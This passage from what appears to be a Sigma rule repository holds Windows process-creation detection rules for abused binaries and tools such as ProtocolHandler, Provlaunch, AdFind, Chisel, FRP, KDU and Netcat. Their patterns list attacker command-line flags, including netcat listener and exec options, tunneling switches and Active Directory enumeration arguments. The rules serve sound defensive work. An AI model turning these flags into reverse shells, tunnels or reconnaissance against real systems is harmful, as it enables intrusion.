    "content": "title: File Download Using ProtocolHandler.exe\nid: 104cdb48-a7a8-4ca7-a453-32942c6e5dcb\nstatus: test\ndescription: |\n    Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\n    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/\nauthor: frack113\ndate: 2021-07-13\nmodified: 2023-11-09\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\protocolhandler.exe'\n        - OriginalFileName: 'ProtocolHandler.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'ftp://'\n            - 'http://'\n            - 'https://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml",
    "content": "title: Potential Provlaunch.EXE Binary Proxy Execution Abuse\nid: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c\nrelated:\n    - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse\n      type: similar\n    - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 # CLI Registry\n      type: similar\n    - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 # Registry\n      type: similar\nstatus: test\ndescription: Detects child processes of \"provlaunch.exe\" which might indicate potential abuse to proxy execution.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/\n    - https://twitter.com/0gtweet/status/1674399582162153472\nauthor: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel\ndate: 2023-08-08\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\provlaunch.exe'\n    filter_main_covered_children:\n        # Note: this filter is here to avoid duplicate alerting by f9999590-1f94-4a34-a91e-951e47bedefd\n        - Image|endswith:\n              - '\\calc.exe'\n              - '\\cmd.exe'\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\notepad.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n        - Image|contains:\n              - ':\\PerfLogs\\'\n              - ':\\Temp\\'\n              - ':\\Users\\Public\\'\n              - '\\AppData\\Temp\\'\n              - '\\Windows\\System32\\Tasks\\'\n              - '\\Windows\\Tasks\\'\n              - '\\Windows\\Temp\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml",
    "content": "title: Suspicious Provlaunch.EXE Child Process\nid: f9999590-1f94-4a34-a91e-951e47bedefd\nrelated:\n    - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c # CLI Generic\n      type: similar\n    - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 # CLI Registry\n      type: similar\n    - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 # Registry\n      type: similar\nstatus: test\ndescription: Detects suspicious child processes of \"provlaunch.exe\" which might indicate potential abuse to proxy execution.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/\n    - https://twitter.com/0gtweet/status/1674399582162153472\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-08\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_parent:\n        ParentImage|endswith: '\\provlaunch.exe'\n    selection_child:\n        - Image|endswith:\n              - '\\calc.exe'\n              - '\\cmd.exe'\n              - '\\cscript.exe'\n              - '\\mshta.exe'\n              - '\\notepad.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\regsvr32.exe'\n              - '\\rundll32.exe'\n              - '\\wscript.exe'\n        - Image|contains:\n              - ':\\PerfLogs\\'\n              - ':\\Temp\\'\n              - ':\\Users\\Public\\'\n              - '\\AppData\\Temp\\'\n              - '\\Windows\\System32\\Tasks\\'\n              - '\\Windows\\Tasks\\'\n              - '\\Windows\\Temp\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml",
    "content": "title: Screen Capture Activity Via Psr.EXE\nid: 2158f96f-43c2-43cb-952a-ab4580f32382\nstatus: test\ndescription: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Psr/\n    - https://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md\nauthor: Beyu Denis, oscd.community\ndate: 2019-10-12\nmodified: 2024-01-04\ntags:\n    - attack.collection\n    - attack.t1113\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\Psr.exe'\n        CommandLine|contains:\n            - '/start'\n            - '-start'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_3proxy_execution.yml",
    "content": "title: PUA - 3Proxy Execution\nid: f38a82d2-fba3-4781-b549-525efbec8506\nstatus: test\ndescription: Detects the use of 3proxy, a tiny free proxy server\nreferences:\n    - https://github.com/3proxy/3proxy\n    - https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-09-13\nmodified: 2023-02-21\ntags:\n    - attack.command-and-control\n    - attack.t1572\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\3proxy.exe'\n    selection_pe:\n        Description: '3proxy - tiny proxy server'\n    selection_params: # param combos seen in the wild\n        CommandLine|contains: '.exe -i127.0.0.1 -p'\n    condition: 1 of selection_*\nfalsepositives:\n    - Administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration.yml",
    "content": "title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE\nid: 455b9d50-15a1-4b99-853f-8d37655a4c1b\nrelated:\n    - id: 9a132afa-654e-11eb-ae93-0242ac130002\n      type: similar\n    - id: 514e7e3e-b3b4-4a67-af60-be20f139198b\n      type: similar\nstatus: test\ndescription: Detects active directory enumeration activity using known AdFind CLI flags\nreferences:\n    - https://www.joeware.net/freetools/tools/adfind/\n    - https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md\nauthor: frack113\ndate: 2021-12-13\nmodified: 2023-03-05\ntags:\n    - attack.discovery\n    - attack.t1087.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_password: # Listing password policy\n        CommandLine|contains:\n            - lockoutduration\n            - lockoutthreshold\n            - lockoutobservationwindow\n            - maxpwdage\n            - minpwdage\n            - minpwdlength\n            - pwdhistorylength\n            - pwdproperties\n    selection_enum_ad: # Enumerate Active Directory Admins\n        CommandLine|contains: '-sc admincountdmp'\n    selection_enum_exchange: # Enumerate Active Directory Exchange AD Objects\n        CommandLine|contains: '-sc exchaddresses'\n    condition: 1 of selection_*\nfalsepositives:\n    - Authorized administrative activity\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_enumeration/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_adfind_execution.yml",
    "content": "title: PUA - AdFind.EXE Execution\nid: 514e7e3e-b3b4-4a67-af60-be20f139198b\nrelated:\n    - id: 455b9d50-15a1-4b99-853f-8d37655a4c1b\n      type: similar\nstatus: experimental\ndescription: Detects execution of Adfind.exe utility, which can be used for reconnaissance in an Active Directory environment\nreferences:\n    - https://www.joeware.net/freetools/tools/adfind/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-02-26\ntags:\n    - attack.discovery\n    - attack.t1087.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        - Image|endswith: '\\AdFind.exe'\n        - OriginalFileName: 'AdFind.exe'\n        - Hashes|contains:\n              - 'IMPHASH=d144de8117df2beceaba2201ad304764'\n              - 'IMPHASH=12ce1c0f3f5837ecc18a3782408fa975'\n              - 'IMPHASH=bca5675746d13a1f246e2da3c2217492'\n              - 'IMPHASH=4fbf3f084fbbb2470b80b2013134df35'\n              - 'IMPHASH=49b639b4acbecc49d72a01f357aa4930'\n              - 'IMPHASH=53e117a96057eaf19c41380d0e87f1c2'\n              - 'IMPHASH=680dad9e300346e05a85023965867201'\n              - 'IMPHASH=21aa085d54992511b9f115355e468782'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_execution/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage.yml",
    "content": "title: PUA - AdFind Suspicious Execution\nid: 9a132afa-654e-11eb-ae93-0242ac130002\nrelated:\n    - id: 455b9d50-15a1-4b99-853f-8d37655a4c1b\n      type: similar\n    - id: 75df3b17-8bcc-4565-b89b-c9898acef911\n      type: obsolete\nstatus: test\ndescription: Detects AdFind execution with common flags seen used during attacks\nreferences:\n    - https://www.joeware.net/freetools/tools/adfind/\n    - https://thedfirreport.com/2020/05/08/adfind-recon/\n    - https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/\n    - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/\n    - https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx\n    - https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md\n    - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1087.002/T1087.002.md#atomic-test-7---adfind---enumerate-active-directory-user-objects\nauthor: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community\ndate: 2021-02-02\nmodified: 2025-10-24\ntags:\n    - attack.discovery\n    - attack.t1018\n    - attack.t1087.002\n    - attack.t1482\n    - attack.t1069.002\n    - stp.1u\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'domainlist'\n            - 'trustdmp'\n            - 'dcmodes'\n            - 'adinfo'\n            - '-sc dclist'\n            - 'computer_pwdnotreqd'\n            - 'objectcategory='\n            - '-subnets -f'\n            - 'name=\"Domain Admins\"'\n            - '-sc u:'\n            - 'domainncs'\n            - 'dompol'\n            - ' oudmp '\n            - 'subnetdmp'\n            - 'gpodmp'\n            - 'fspdmp'\n            - 'users_noexpire'\n            - 'computers_active'\n            - 'computers_pwdnotreqd'\n    condition: selection\nfalsepositives:\n    - Legitimate admin activity\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_pua_adfind_susp_usage/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Adfind - Enumerate Active Directory Computer Objects\n      technique: T1018\n      atomic_guid: a889f5be-2d54-4050-bd05-884578748bb4\n    - type: atomic-red-team\n      name: Adfind - Enumerate Active Directory Domain Controller Objects\n      technique: T1018\n      atomic_guid: 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml",
    "content": "title: PUA - Advanced IP Scanner Execution\nid: bef37fa2-f205-4a7b-b484-0759bfd5f86f\nstatus: test\ndescription: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.\nreferences:\n    - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/\n    - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html\n    - https://labs.f-secure.com/blog/prelude-to-ransomware-systembc\n    - https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf\n    - https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer\n    - https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20IP%20Scanner\nauthor: Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy\ndate: 2020-05-12\nmodified: 2023-02-07\ntags:\n    - attack.discovery\n    - attack.t1046\n    - attack.t1135\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|contains: '\\advanced_ip_scanner' # Covers also advanced_ip_scanner_console.exe\n        - OriginalFileName|contains: 'advanced_ip_scanner' # Covers also advanced_ip_scanner_console.exe\n        - Description|contains: 'Advanced IP Scanner'\n    selection_cli:\n        CommandLine|contains|all:\n            - '/portable'\n            - '/lng'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate administrative use\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_ip_scanner/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner.yml",
    "content": "title: PUA - Advanced Port Scanner Execution\nid: 54773c5f-f1cc-4703-9126-2f797d96a69d\nstatus: test\ndescription: Detects the use of Advanced Port Scanner.\nreferences:\n    - https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/Advanced%20Port%20Scanner\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-18\nmodified: 2023-02-07\ntags:\n    - attack.discovery\n    - attack.t1046\n    - attack.t1135\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|contains: '\\advanced_port_scanner'\n        - OriginalFileName|contains: 'advanced_port_scanner' # Covers also advanced_port_scanner_console.exe\n        - Description|contains: 'Advanced Port Scanner'\n    selection_cli:\n        CommandLine|contains|all:\n            - '/portable'\n            - '/lng'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate administrative use\n    - Tools with similar commandline (very rare)\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advanced_port_scanner/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml",
    "content": "title: PUA - AdvancedRun Execution\nid: d2b749ee-4225-417e-b20e-a8d2193cbb84\nrelated:\n    - id: fa00b701-44c6-4679-994d-5a18afa8a707\n      type: similar\nstatus: test\ndescription: Detects the execution of AdvancedRun utility\nreferences:\n    - https://twitter.com/splinter_code/status/1483815103279603714\n    - https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3\n    - https://www.elastic.co/security-labs/operation-bleeding-bear\n    - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-20\nmodified: 2023-02-21\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1564.003\n    - attack.t1134.002\n    - attack.t1059.003\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        - OriginalFileName: 'AdvancedRun.exe'\n        - CommandLine|contains|all:\n              - ' /EXEFilename '\n              - ' /Run'\n        - CommandLine|contains|all:\n              - ' /WindowState 0'\n              - ' /RunAs '\n              - ' /CommandLine '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml",
    "content": "title: PUA - AdvancedRun Suspicious Execution\nid: fa00b701-44c6-4679-994d-5a18afa8a707\nrelated:\n    - id: d2b749ee-4225-417e-b20e-a8d2193cbb84\n      type: similar\nstatus: test\ndescription: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts\nreferences:\n    - https://twitter.com/splinter_code/status/1483815103279603714\n    - https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3\n    - https://www.elastic.co/security-labs/operation-bleeding-bear\n    - https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-20\nmodified: 2023-02-21\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1134.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        CommandLine|contains:\n            - '/EXEFilename'\n            - '/CommandLine'\n    selection_runas:\n        - CommandLine|contains:\n              - ' /RunAs 8 '\n              - ' /RunAs 4 '\n              - ' /RunAs 10 '\n              - ' /RunAs 11 '\n        - CommandLine|endswith:\n              - '/RunAs 8'\n              - '/RunAs 4'\n              - '/RunAs 10'\n              - '/RunAs 11'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_chisel.yml",
    "content": "title: PUA - Chisel Tunneling Tool Execution\nid: 8b0e12da-d3c3-49db-bb4f-256703f380e5\nrelated:\n    - id: cf93e05e-d798-4d9e-b522-b0248dc61eaf\n      type: similar\nstatus: test\ndescription: Detects usage of the Chisel tunneling tool via the commandline arguments\nreferences:\n    - https://github.com/jpillora/chisel/\n    - https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\n    - https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-09-13\nmodified: 2023-02-13\ntags:\n    - attack.command-and-control\n    - attack.t1090.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\chisel.exe'\n    selection_param1:\n        CommandLine|contains:\n            - 'exe client '\n            - 'exe server '\n    selection_param2:\n        CommandLine|contains:\n            - '-socks5'\n            - '-reverse'\n            - ' r:'\n            - ':127.0.0.1:'\n            - '-tls-skip-verify '\n            - ':socks'\n    condition: selection_img or all of selection_param*\nfalsepositives:\n    - Some false positives may occur with other tools with similar commandlines\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_cleanwipe.yml",
    "content": "title: PUA - CleanWipe Execution\nid: f44800ac-38ec-471f-936e-3fa7d9c53100\nstatus: test\ndescription: Detects the use of CleanWipe, a tool usually used to remove Symantec antivirus products.\nreferences:\n    - https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-18\nmodified: 2023-02-14\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        Image|endswith: '\\SepRemovalToolNative_x64.exe'\n    selection2:\n        Image|endswith: '\\CATClean.exe'\n        CommandLine|contains: '--uninstall'\n    selection3:\n        Image|endswith: '\\NetInstaller.exe'\n        CommandLine|contains: '-r'\n    selection4:\n        Image|endswith: '\\WFPUnins.exe'\n        CommandLine|contains|all:\n            - '/uninstall'\n            - '/enterprise'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate administrative use (should be investigated either way)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_crassus.yml",
    "content": "title: PUA - Crassus Execution\nid: 2c32b543-1058-4808-91c6-5b31b8bed6c5\nstatus: test\ndescription: Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.\nreferences:\n    - https://github.com/vu-ls/Crassus\nauthor: pH-T (Nextron Systems)\ndate: 2023-04-17\ntags:\n    - attack.discovery\n    - attack.reconnaissance\n    - attack.t1590.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\Crassus.exe'\n        - OriginalFileName: 'Crassus.exe'\n        - Description|contains: 'Crassus'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_csexec.yml",
    "content": "title: PUA - CsExec Execution\nid: d08a2711-ee8b-4323-bdec-b7d85e892b31\nstatus: test\ndescription: Detects the use of the lesser-known remote execution tool CsExec, a PsExec alternative\nreferences:\n    - https://github.com/malcomvetter/CSExec\n    - https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-22\nmodified: 2023-02-21\ntags:\n    - attack.resource-development\n    - attack.t1587.001\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\csexec.exe'\n    selection_pe:\n        Description: 'csexec'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_defendercheck.yml",
    "content": "title: PUA - DefenderCheck Execution\nid: f0ca6c24-3225-47d5-b1f5-352bf07ecfa7\nstatus: test\ndescription: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.\nreferences:\n    - https://github.com/matterpreter/DefenderCheck\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-08-30\nmodified: 2023-02-04\ntags:\n    - attack.defense-evasion\n    - attack.t1027.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\DefenderCheck.exe'\n        - Description: 'DefenderCheck'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_ditsnap.yml",
    "content": "title: PUA - DIT Snapshot Viewer\nid: d3b70aad-097e-409c-9df2-450f80dc476b\nstatus: test\ndescription: Detects the use of the Ditsnap tool, an inspection tool for the Active Directory database, ntds.dit.\nreferences:\n    - https://thedfirreport.com/2020/06/21/snatch-ransomware/\n    - https://web.archive.org/web/20201124182207/https://github.com/yosqueoy/ditsnap\nauthor: Furkan Caliskan (@caliskanfurkan_)\ndate: 2020-07-04\nmodified: 2023-02-21\ntags:\n    - attack.credential-access\n    - attack.t1003.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\ditsnap.exe'\n        - CommandLine|contains: 'ditsnap.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate admin usage\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_frp.yml",
    "content": "title: PUA - Fast Reverse Proxy (FRP) Execution\nid: 32410e29-5f94-4568-b6a3-d91a8adad863\nstatus: test\ndescription: Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.\nreferences:\n    - https://asec.ahnlab.com/en/38156/\n    - https://github.com/fatedier/frp\nauthor: frack113, Florian Roth\ndate: 2022-09-02\nmodified: 2024-11-23\ntags:\n    - attack.command-and-control\n    - attack.t1090\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith:\n            - '\\frpc.exe'\n            - '\\frps.exe'\n    selection_cli:\n        CommandLine|contains: '\\frpc.ini'\n    selection_hashes:\n        # v0.44.0\n        Hashes|contains:\n            - \"MD5=7D9C233B8C9E3F0EA290D2B84593C842\"\n            - \"SHA1=06DDC9280E1F1810677935A2477012960905942F\"\n            - \"SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C\"\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate use\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_iox.yml",
    "content": "title: PUA - IOX Tunneling Tool Execution\nid: d7654f02-e04b-4934-9838-65c46f187ebc\nstatus: test\ndescription: Detects the use of IOX - a tool for port forwarding and intranet proxy purposes\nreferences:\n    - https://github.com/EddieIvan01/iox\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-10-08\nmodified: 2024-11-23\ntags:\n    - attack.command-and-control\n    - attack.t1090\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\iox.exe'\n    selection_commandline:\n        CommandLine|contains:\n            - '.exe fwd -l '\n            - '.exe fwd -r '\n            - '.exe proxy -l '\n            - '.exe proxy -r '\n    selection_hashes:\n        # v0.4\n        Hashes|contains:\n            - \"MD5=9DB2D314DD3F704A02051EF5EA210993\"\n            - \"SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD\"\n            - \"SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731\"\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate use\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_kdu_driver_tool.yml",
    "content": "title: PUA - Kernel Driver Utility (KDU) Execution\nid: e76ca062-4de0-4d79-8d90-160a0d335eca\nstatus: experimental\ndescription: |\n    Detects execution of the Kernel Driver Utility (KDU) tool.\n    KDU can be used to bypass driver signature enforcement and load unsigned or malicious drivers into the Windows kernel,\n    potentially allowing for privilege escalation, persistence, or evasion of security controls.\nreferences:\n    - https://github.com/h4rmy/KDU\n    - https://huntress.com/blog/esxi-vm-escape-exploit\nauthor: Matt Anderson, Dray Agha, Anna Pham (Huntress)\ndate: 2026-01-02\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\kdu.exe'\n              - '\\hamakaze.exe'\n        - OriginalFileName: 'hamakaze.exe'\n    selection_cli_suspicious:\n        CommandLine|contains:\n            - '-map ' # map driver to the kernel and execute its entry point\n            - '-prv ' # optional, select the vulnerable driver provider\n            - '-dse ' # write user defined value to the system DSE state flags; dse=0 (disable), dse=1 (enable)\n            - '-ps ' # modify process object of given ProcessID\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate driver development, testing, or administrative troubleshooting (e.g., enabling/disabling hardware)\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_pua_kdu_driver_tool/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_mouselock_execution.yml",
    "content": "title: PUA - Mouse Lock Execution\nid: c9192ad9-75e5-43eb-8647-82a0a5b493e3\nstatus: test\ndescription: Kaspersky's 2020 Incident Response Analyst Report lists the legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.\nreferences:\n    - https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf\n    - https://sourceforge.net/projects/mouselock/\nauthor: Cian Heasley\ndate: 2020-08-13\nmodified: 2023-02-21\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.t1056.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection:\n        - Product|contains: 'Mouse Lock'\n        - Company|contains: 'Misc314'\n        - CommandLine|contains: 'Mouse Lock_'\n    condition: selection\nfalsepositives:\n    - Legitimate uses of Mouse Lock software\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_netcat.yml",
    "content": "title: PUA - Netcat Suspicious Execution\nid: e31033fc-33f0-4020-9a16-faf9b31cbf08\nstatus: test\ndescription: Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network\nreferences:\n    - https://nmap.org/ncat/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md\n    - https://www.revshells.com/\nauthor: frack113, Florian Roth (Nextron Systems)\ndate: 2021-07-21\nmodified: 2023-02-08\ntags:\n    - attack.command-and-control\n    - attack.t1095\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        # can not use OriginalFileName as is empty\n        Image|endswith:\n            - '\\nc.exe'\n            - '\\ncat.exe'\n            - '\\netcat.exe'\n    selection_cmdline:\n        # Typical command lines\n        CommandLine|contains:\n            - ' -lvp '\n            - ' -lvnp'\n            - ' -l -v -p '\n            - ' -lv -p '\n            - ' -l --proxy-type http '\n            # - ' --exec cmd.exe ' # Not specific enough for netcat\n            - ' -vnl --exec '\n            - ' -vnl -e '\n            - ' --lua-exec '\n            - ' --sh-exec '\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate ncat use\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_pua_netscan.yml",
